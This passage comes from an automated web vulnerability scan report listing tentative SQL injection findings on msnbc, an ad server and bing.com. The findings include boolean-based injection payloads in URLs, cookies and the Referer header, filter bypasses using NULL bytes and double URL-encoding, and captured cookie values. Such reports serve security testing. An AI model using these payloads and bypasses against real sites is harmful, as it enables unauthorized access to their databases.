Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

1.87. http://technolog.msnbc.redacted/facebook [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/facebook

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /facebook?1%20and%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

Request 2

GET /facebook?1%20and%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

1.88. http://technolog.msnbc.redacted/featured [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/featured

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14912380'%20or%201%3d1--%20 and 14912380'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /featured?114912380'%20or%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

Request 2

GET /featured?114912380'%20or%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

1.89. http://technolog.msnbc.redacted/justin-bieber [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/justin-bieber

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 68290612%20or%201%3d1--%20 and 68290612%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /justin-bieber?168290612%20or%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

Request 2

GET /justin-bieber?168290612%20or%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

1.90. http://technolog.msnbc.redacted/mark-zuckerberg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/mark-zuckerberg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 48291817'%20or%201%3d1--%20 and 48291817'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mark-zuckerberg48291817'%20or%201%3d1--%20 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

Request 2

GET /mark-zuckerberg48291817'%20or%201%3d2--%20 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

1.91. http://technolog.msnbc.redacted/xbox [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/xbox

Issue detail

Request 1

GET /xbox'%20and%201%3d1--%20 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

Request 2

GET /xbox'%20and%201%3d2--%20 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

1.92. http://technolog.msnbc.redacted/xbox [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/xbox

Issue detail

Request 1

GET /xbox?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

Request 2

GET /xbox?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

1.93. http://today.msnbc.redacted/id/41319614/ns/today-entertainment/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://today.msnbc.msn.com
Path:	/id/41319614/ns/today-entertainment/

Issue detail

Request 1

GET /id/41319614'%20and%201%3d1--%20/ns/today-entertainment/ HTTP/1.1
Host: today.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /id/41319614'%20and%201%3d2--%20/ns/today-entertainment/ HTTP/1.1
Host: today.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.94. http://redcated/APM/iview/139941180/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://redcated
Path:	/APM/iview/139941180/direct

Issue detail

Request 1

GET /APM/iview/139941180/direct?1'=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 4790
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:51:49 GMT
Connection: close


<html>
<head>
<title>HealthyMinerals_728x90_Iframe_Homepage</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQ
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /APM/iview/139941180/direct?1''=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 199
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:51:50 GMT
Connection: close

<script language="JavaScript"
class="adsvelocity_728x90"
src="http://media.adsvelocity.com/ad/24.js?click=http://clk.atdmt.com/go/139941180/direct;ai.198084592.198090580;ct.1/01?href=""></script>

1.95. http://redcated/APM/iview/148848786/direct [;wi.728;hi.90/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://redcated
Path:	/APM/iview/148848786/direct

Issue detail

The ;wi.728;hi.90/01?click parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ;wi.728;hi.90/01?click parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click=' HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7022
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:07 GMT

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-wi
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click='' HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 245
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:08 GMT

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "2";
CasaleArgs.casaleID = 120511;
</script>
<script type="text/javascript" src="http:
...[SNIP]...

1.96. http://redcated/APM/iview/148848786/direct [AA002 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://redcated
Path:	/APM/iview/148848786/direct

Issue detail

The AA002 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the AA002 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607%00'; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6607
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:10 GMT

<html><head><title>FLORIST_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;" bgcol
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 245
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:09 GMT

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "2";
CasaleArgs.casaleID = 120511;
</script>
<script type="text/javascript" src="http:
...[SNIP]...

1.97. http://redcated/APM/iview/148848786/direct [MUID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://redcated
Path:	/APM/iview/148848786/direct

Issue detail

Remediation detail

Request 1

GET /APM/iview/148848786/direct HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6497
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 18:57:20 GMT
Connection: close

<html><head><title>FLORIST_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;" bgcol
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1196
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 18:57:21 GMT
Connection: close


<iframe id='a2af6744' name='a2af6744' src='http://ads01.maxcdn.com/afr.php?zoneid=168&cb=INSERT_RANDOM_NUMBER_HERE' frameborder='0' scrolling='no' width='728' height=
...[SNIP]...

1.98. http://redcated/APM/iview/148848786/direct [MUID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://redcated
Path:	/APM/iview/148848786/direct

Issue detail

The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7015
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:11 GMT

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-wi
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 260
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:12 GMT

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/189252332.194920818/148848786/direct;wi.728;hi.90/01" onclick="(new Image).src='http://t.redcated'"><img src="http://ec.atdmt
...[SNIP]...

1.99. http://redcated/APM/iview/148848786/direct [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://redcated
Path:	/APM/iview/148848786/direct

Issue detail

Remediation detail

Request 1

GET /APM%2527/iview/148848786/direct HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6905
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:39:12 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-wi
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

GET /APM%2527%2527/iview/148848786/direct HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1416
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:39:12 GMT
Connection: close

<SCRIPT Language="Javascript">
var MPcode = "12760-79049-27909-2";
var MPwidth = "728";
var MPheight = "90";
var randNum = Math.floor(Math.random() * 10000000);
var iframesrc = "http://altfarm.me
...[SNIP]...

1.100. http://redcated/APM/iview/148848786/direct [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://redcated
Path:	/APM/iview/148848786/direct

Issue detail

Request 1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6417
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:39:10 GMT
Connection: close

<html><head><title>IntelligentSource 728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 245
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:39:10 GMT
Connection: close

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "2";
CasaleArgs.casaleID = 120511;
</script>
<script type="text/javascript" src="http:
...[SNIP]...

1.101. http://redcated/APM/iview/148848786/direct [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://redcated
Path:	/APM/iview/148848786/direct

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

Request 1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6905
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:52:08 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-wi
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1196
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:52:08 GMT
Connection: close


<iframe id='a2af6744' name='a2af6744' src='http://ads01.maxcdn.com/afr.php?zoneid=168&cb=INSERT_RANDOM_NUMBER_HERE' frameborder='0' scrolling='no' width='728' height=
...[SNIP]...

1.102. http://www.bing.com/videos/browse [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/videos/browse

Issue detail

Request 1

GET /videos/browse?mkt=en-us&vid=&1'=1 HTTP/1.1
Host: www.bing.com
Accept: */*
